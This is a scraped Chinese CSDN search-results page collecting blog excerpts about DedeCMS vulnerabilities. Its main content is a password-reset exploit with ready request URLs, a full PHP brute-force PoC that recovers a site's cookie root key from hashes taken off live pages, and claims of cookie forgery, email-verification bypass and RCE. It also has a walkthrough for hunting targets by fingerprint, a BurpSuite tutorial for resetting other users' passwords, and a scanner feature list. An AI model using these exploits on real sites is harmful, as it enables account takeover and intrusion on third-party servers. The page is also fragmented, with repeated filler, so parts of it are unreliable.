精华内容
下载资源
问答
  • dedecms漏洞

    2013-12-01 12:01:01
    dedecms漏洞
  • Dedecms漏洞测试

    2012-07-24 10:19:25
    Dedecms漏洞测试
  • dedecms漏洞,病毒检查

    2018-08-20 00:10:49
    全面排查dedecms漏洞,包含5.7版本。无毒、安全、快捷。
  • 漏洞环境Fofa搜dedecms漏洞危害重置系统的所有账号的密码影响范围DeDecms V5.7 SP2最新版本漏洞复现首先注册账号0000001/0000002登录成功通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器,再次访问...

    漏洞环境

    Fofadedecms

    漏洞危害

    重置系统的所有账号的密码

    影响范围

    DeDecms V5.7 SP2最新版本

    漏洞复现

    首先注册账号0000001/0000002

    2f39946fba129e83f18e300fe5e04210.png

    登录成功

    98063a073025ded65d1986bc033ec5ac.png

    通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器,再次访问登录页面

    801d57c5e86404f1700d669ff4e1d1de.png

    构造请求包生成poc

    /member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=16

    be3e4b3868331150c5f30e8182a0d755.png

    根据poc构造重置密码的url

    http://www.xxx.com/member/resetpassword.php?dopost=getpasswd&id=16&key=b8sJ1HN6

    74488877199da12d82bada48ac878b5d.png

    直接在这对目标账号修改个新密码就行了。

    展开全文
  • dedecms5.7 Fk 织梦DedeCms 漏洞扫描爆破工具
  • DedeCms漏洞利用工具

    2010-07-29 18:38:00
    DedeCms漏洞利用工具 08年的了。5.1
  • DEDECMS漏洞利用工具

    热门讨论 2008-11-28 02:06:05
    最新的DEDECMS漏洞利用工具,方便马上入侵DEDECMS系统!
  • 我是小白,做毕设题目是dedecms漏洞分析,请问社区大佬们需要用python哪方面的知识多一点,感谢支持,新手勿喷,谢谢!!
  • 一 、本篇本文为“DEDECMS伪随机漏洞”系列第三篇,查看前两篇可点击底部【阅读原文】:第一篇:《DEDECMS伪随机漏洞分析 (一) PHP下随机函数的研究》第二篇:《DEDECMS伪随机漏洞分析 (二) cookie算法与key随机强度...

    一 、本篇

    本文为“DEDECMS伪随机漏洞”系列第三篇,查看前两篇可点击底部【阅读原文】:

    第一篇:《DEDECMS伪随机漏洞分析 (一) PHP下随机函数的研究》

    第二篇:《DEDECMS伪随机漏洞分析 (二) cookie算法与key随机强度分析》

    根据第二篇,我们有信心去遍历root key的所有可能, 但是我们还需要一个碰撞点, 才能真正得到root key的值, 本篇找到了两个碰撞点, 并编写了简单的POC来获取root key。

    二 、碰撞点

    可能还存在其他碰撞点, 这儿仅找到两个: )

    1.用户主页

    1.1 限制条件(中)

    要求开启会员功能

    1.2 代码分析

    27d362fa7018033e90e4518d68ae9f05.png

    1.3 获取方法

    请求:(查看admin主页)

    url+/member/index.php?uid=admin

    响应:

    admin

    last_vid_ckMd5 的hash值

    50fdfe47f0ebfd32aba49d796068f432.png

    2. 自定义表单

    2.1 限制条件(低)

    网站管理员需要为网站定义表单.

    下载了几套通过DEDECMS改造的模板, 都保留了该功能, 且大部分站点有自己的表单格式.或者说正常在使用的dedcms大部分都有表单: )

    2.2 代码分析

    d89fefa5a02d929f66406f13cbdd475a.png563ddb7f0b16448ea1ec4fbcbecddc1c.png

    2.3 获取方法

    请求:(查看表单)

    url+/plus/diy.php?diyid=1

    响应:

    dede_fieIds

    dede_fieIdshash 这两个值

    e3e165cc0d002f14654f9919c8afd8c7.png

    3. POC

    1. 保存如下代码到dede_funcookie.php
    2. 修改里面的$cpu, $attack_method, $attack_param, $attack_hash
    3. 若是目标网站为php7: php7 dede_funcookie.php 若是目标网站为php5: php5 dede_funcookie.php,若是不明确可以两个都跑 ε=ε=ε=(~ ̄▽ ̄)~
    4. 在16核 CPU,8G内存下, 跑完整个程序需要 4444秒,建议不要同时跑两个, 注意自己的CPU负载情况

    <?php $t1=microtime(true);echo "开始时间: $t1\n";//请填写下面的信息$cpu = 8; // cpu: CPU核数,$cpu对应到开启的进程的数量,不宜过高$attack_method = 2; // 碰撞类型: 如果是用户主页就是1, 自定义表单就是2$attack_param = "";  // 数据: 选择1填写uid, 选择2填写dede_fields$attack_hash = "";   // hash: 填写hash$max_ = 4294967296;$targets_ = [];$the_1 = (int)($max_ / $cpu);$the_2 = $max_ % $cpu;for ($i = 0; $i < $cpu; $i++){    array_push($targets_,[($i)*$the_1,($i+1)*$the_1]);}$chars='abcdefghigklmnopqrstuvwxwyABCDEFGHIGKLMNOPQRSTUVWXWY0123456789';$max = 61; // strlen($chars) - 1;$already_test = 0;for ($i = 0; $i < $cpu; $i++){    $pid = pcntl_fork();    if ($pid == -1) {        die("could not fork");    } elseif ($pid) {        ;        //echo $pid;        //echo "I'm the Parent $i\n";    } else {        //var_dump($targets_[$i][0]);        the_poc($targets_[$i][0],$targets_[$i][1],$i);        exit;    }}function the_poc($start,$end,$id){    global $chars;    global $max;    global $attack_method;    global $attack_param;    global $attack_hash;    $the_whole = (int)(($end-$start)/1000000);    $i_do = 0;    for($y = $start; $y<= $end; $y++) {        if (($i_do%1000000) == 1){                echo "$id 已完成(x1000000): ";                echo (int)($i_do/1000000);                echo "/$the_whole\n";        }        $i_do = $i_do + 1;        srand($y);        $length = rand(28,32);        mt_srand($y);        $rnd_cookieEncode='';        for($i = 0; $i < $length; $i++) {            $rnd_cookieEncode .= $chars[mt_rand(0, $max)];        }        if ($attack_method==1){            if (substr(md5($rnd_cookieEncode.$attack_param),0,16) == $attack_hash){                echo "here!!!!\n";                echo $rnd_cookieEncode;                echo "\n";                echo $y;                echo "\n";                break;            }        }else{            if (md5($attack_param.$rnd_cookieEncode) == $attack_hash){                    echo "here!!!!\n";                    echo $rnd_cookieEncode;                    echo "\n";                    echo $y;                    echo "\n";            }        }    }}// 等待子进程执行结束while (pcntl_waitpid(0, $status) != -1) {    $status = pcntl_wexitstatus($status);    $pid = posix_getpid();    echo "Child $status completed\n";}$t2=microtime(true)-$t1; //获取程序1,结束的时间echo "总计用时: $t2\n";?>

    四、危害

    1. Cookie伪造

    2. 通过邮箱认证

    3. 前台RCE

    邮箱hash算法,唯一不知道的是rootkey, 通过poc跑出了rootkey,就能构造出来,然后访问hash即可通过邮箱认证, 对于”dedecms前台任意用户登录”的利用有些许帮助⑧

    五、实战

    TIPS: 可以通过指纹,把hash全部采集到, 然后脚本跑一遍即可全部出结果, 因为全网的dedecms的root key分布在2^33这个范围内: ), 在跑脚本遍历这个范围的时候其实都覆盖到了.

    FIND A Luck One:

    1. 指纹查找

    79e7a99592c339979d0bbb353b701574.png

    2. 碰撞data和hash

    18f8b98d2d719136c44a532ac6a57804.png

    3. ATTACK:

    修改一下dede_funcookie.php里面的参数:*本文作者:,转载请注明来自FreeBuf.COM

    $cpu = 16$attack_method = 2$attack_param = "name,text;tel,text;content,text;hz,text;qq,text"$attack_hash = "a058f44c032cf2e4da07ebe80fbd52d8"

    1e8d96d006fd0324585a64f2eaeafc42.png

    4. GET ROOT KEY AND ENJOY:

    睡了一觉, 看一下结果:

    在nohup2.out里面:

    7895565a7b5fe55336499d45eb426864.png

    防护建议

    可以考虑在rootkey后面手动加入一些值,或者生成算法部分加入当前时间、ip、servername,或者uuid混合一下,作为防护手段。

    *本文作者:光通天下,转载请注明来自FreeBuf.COM

    993dad82d22e630dca58ff00250381b9.gif

    精彩推荐

    f381b228b290898ad8be3c7976212a67.png

    6908909332c30d332900a289ecaec079.pngfc5651a9b52f48bf2f55184ec0bd5eef.pngbef64273197aa4c61b379739ca28fcd9.png

    2caa3cb04aa0478cc0e36a8d49180215.gif

    展开全文
  • dedescan是一款可以扫描所有已公开的dedecms漏洞的扫描器。 ... ... ... ... ...
    4af9b64e3a791e6bf44a8e2aad58845c.gifdedescan是一款可以扫描所有已公开的dedecms漏洞的扫描器。
        ...                 ...                                                         ...                 ...                                                         ...                 ...                                                         ...                 ...                                                         ...                 ...

    用法:python3 dedescan.py

    然后直接输入域名即可

    已实现的功能

    • 后台查找(win)

    • 版本探测

    • 短路经检测

    • 路径检测

    • trace检测

    • advancedsearch.php SqlInject

    • sql_class.php SqlInject

    • feedback_js.php SqlInject

    • getpage xss

    • guestbook.php SqlInject

    • infosearch.php SqlInject

    • jump.php xss

    • login.php xss

    • recommend.php SQL

    • redirect

    • reg_new.php SqlInject

    • search.php sqlinject

    • V5order by SqlInject

    • article_keyword_select.php xss

    • catelog_tree.php xss

    • content_list.php xss

    • file_pic_vie.php xss

    • pic_view.php xss

    • select_images.php xss

    • writebook getshell

    • digg_frame.php rce

    • list.php xss

    • login.php xss

    • config.php xss

    • flash xss

    部分截图

    3e7890cd5ffdc45fe54de89d3ddae3b8.png

    其他说明

    所有exp、poc均为网上收集,若侵犯了您的利益还望联系本人,一定删除本程序依赖:
    • requests

    • re

    • termcolor

    • threading

    • itertools

    因为本程序编写只是为了自己使用,未加入批量功能,连多线程都是很随意(甚至都不能算是多线程),有时间再重构吧.....

    下载地址

    https://github.com/lengjibo/dedecmscan

    ^^^^^^^^^觉得好可以给个star哦

    3ae221fdd2a7806fe01a8f210a21bf7e.gif     ▼ 更多精彩推荐,请关注我们 ▼

    1a1619cb2a00b36df39ad23b65f92475.png

    展开全文
  • 今天给大家讲解一下如何使用... Dedecms漏洞复刻创建Dedecms网站安装BurpSuite三级目录 创建Dedecms网站 首先第一步是先创建一个网站 下面是建立网站的流程链接: 链接: link. 安装BurpSuite BurpSuite 三级目录 ...

    今天给大家讲解一下如何使用BurpSuite随意修改Dedecms的其他用户的密码。

    创建Dedecms网站

    首先第一步是先创建一个网站
    下面是建立网站的流程链接:

    链接: https://blog.csdn.net/qq_51555426/article/details/109179295

    安装BurpSuite

    BurpSuite的安装方式大家可以自行选择:

    • 使用Kali Linux虚拟机自带的BurpSuite
    • 在主机中安装BurpSuite

    安装过程和教程都可以在CSDN上找到:

    https://blog.csdn.net/?spm=1010.2135.3001.4477

    进入Dedecms网注册用户

    注册测试用户1用户2,不设置安全问题。

    修改浏览器网络代理配置

    这里我用的是Firefox浏览器,所以我们以Firefox浏览器为例:

    • 打开浏览器选项,找到网络设置

    • 将设置里的网络代理改成手动代理,HTTP代理地址用本机地址127.0.0.1,选用8080端口:

    开启BurpSuite进入Dedecms网

    • 假定我们现在登录的是用户1,首先进入用户密码修改界面:

    • 在网站后输入

    ?dopost=safequestion&safequestion=0.0&id=3

    • 然后我们便可以在BurpSuite上获得截获的数据:

    此时的Dedecms网界面是这样的:

    此时在BurpSuite点击放包Forward,然后再点击Dedecms网上的

    如果你的浏览器没反应,请点击这里…

    就可以进入到用户密码修改界面修改用户2的密码啦!在这里插入图片描述

    展开全文
  • DedeCMS漏洞复现

    2021-03-10 22:21:26
    介绍 织梦CMS是集简单、健壮、灵活、开源几大特点的开源内容管理系统,目前占领了国内开源CMS的大部份市场,目前已经有超过三十万个站点正在使用织梦CMS...任意文件操作漏洞复现 进到网站后台–》访问 dede/tpl.php?act
  • dedeCMS 漏洞修复

    2019-05-08 17:03:50
    1. RemoveXSS漏洞 E:\315\...增加:val=htmlspecialchars(val = htmlspecialchars(val=htmlspecialchars(val); //2019-05-08 修复 2. 【检查】 /plus/search.php,dedecms注入漏洞 3 /plus...
  • dedecms漏洞利用教程

    2018-08-29 18:29:12
    织梦系统漏洞汇总,广大二次开发者需要查缺补漏的地方!
  • DedeCMS漏洞文件之carbuyaction.php

    千次阅读 2015-01-13 11:55:52
    DedeCMS漏洞文件之carbuyaction.php dedecms教程 DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell 详细说明:漏洞文件...
  • 织梦DeDeCMS漏洞还原 运行环境: 艰难版本:apache+php+mysql(链接放这了,太过难搞,新手用下面) apache2.46:https://www.apachelounge.com/download/ php7.46:https://windows.php.net/download#php-7.4 mysql...
  • DEDECMS 漏洞汇总

    千次阅读 2019-09-29 06:29:30
    漏洞版本:v5.5 - v5.7 前台任意用户密码重置 首先注册一个账户,账户名为 0000001,此处注册的账户,前面是多个 0,后面是 1 就行。 注册链接: http://192.168.31.59/member/index_do.php?fmd...
  • ​source.aiconvert.cn漏洞dedecms后台文件任意上传漏洞简介dedecms早期版本后台存在大量的富文本编辑器,该控件提供了一些文件上传接口,同时dedecms对上传文件的后缀类型未进行严格的限制,这导致了黑客可以上传...
  • 这也就是传说中的Apache解析漏洞。   利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。 目标站点的Apache存在文件解析漏洞。即index.php.bak文件会被当做...
  • DEDECMS 漏洞修复方案

    2019-10-04 03:37:31
    DEDECMS支付模块注入漏洞 漏洞文件: /include/payment/alipay.php 漏洞描述: 对输入参数$_GET['out_trade_no']未进行严格过滤 修复方案: 对该参数实体转义即可 addslashes($_GET['out_trade_no']) 大约在136行 补丁...
  • 织梦dedecms漏洞修复大全(5.7起)

    千次阅读 2018-06-08 17:47:50
    织梦dedecms漏洞修复大全(5.7起)很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题. 好,我们来一个一个修复。修复方法都是下载目录下该文件,然后替换或添加部分...
  • 织梦dedecms漏洞修复大全注入漏洞

    千次阅读 2016-12-21 15:57:17
    很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天乐清网站建设的赵老师就为大家讲解一下如何修复任意文件上传漏洞与注入漏洞。任意文件上传漏洞修复包含一个...
  • dedecms漏洞修复

    2017-07-20 11:12:00
    任意文件上传漏洞修复 一、/include/dialog/select_soft_post.php文件,搜索(大概在72行左右) $fullfilename = $cfg_basedir.$activepath.'/'.$filename; 修改为 if (preg_match(...
  • DeDeCMS 漏洞修改汇总

    千次阅读 2018-02-28 13:38:46
    1、标题: dedecms模版SQL注入漏洞披露时间: 1970-01-01 08:00:00简介:dedecms的/member/soft_add.php中,对输入模板参数$servermsg1未进行严格过滤,导致攻击者可构造模版闭合标签,实现模版注入进行GETSHELL。...
  • DedeCms 漏洞为什么能覆盖数据库配置变量 http://www.0x50sec.org/0day-exp/2011/08/id/1164/#more-1164 2011年08月31日漏洞代码DEDECMS、GLOBALS、变量覆盖admin 这件事说来比较惭愧,之前发现Dedecms有...
  • 织梦dedecms漏洞修复记

    千次阅读 2018-06-26 18:03:18
    自己用dedecms在阿里云上搭建了套网站,之后阿里云漏洞提示,织梦有多个漏洞需要我修复,发我邮箱,今天整理了下,我遇到的漏洞,及我修复的过程。漏洞描述:dedecms的/member/soft_add.php中,对输入模板参数$...
  • DedeCMS漏洞之mysql_error_trace.inc日志信息 DedeCMS漏洞之mysql_error_trace.inc日志信息 dedecms教程 DEDE mysql_error_trace.inc 日志里面残留被入侵过的账号和密码 漏洞说明:plus/search.php被爆过...
  • 我们要运营自己的网站,首先要有一个网站,现在做一个网站的成本已经很...其中的dedecms,帝国cms都可以用于企业展示网站和个人博客网站,小型商城,以及b2b网站的制作,其中的帝国cms还可以用于门户网站的制作。2....
  • DedeCMS 漏洞集合

    千次阅读 2013-01-03 10:12:08
    DedeCMS会员中心分类管理SQL注射 需要magic_quotes_gpc = Off,所以说是鸡肋啊. 发生在数组key里的注射漏洞,有点意思. 这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 989
精华内容 395
关键字:

dedecms漏洞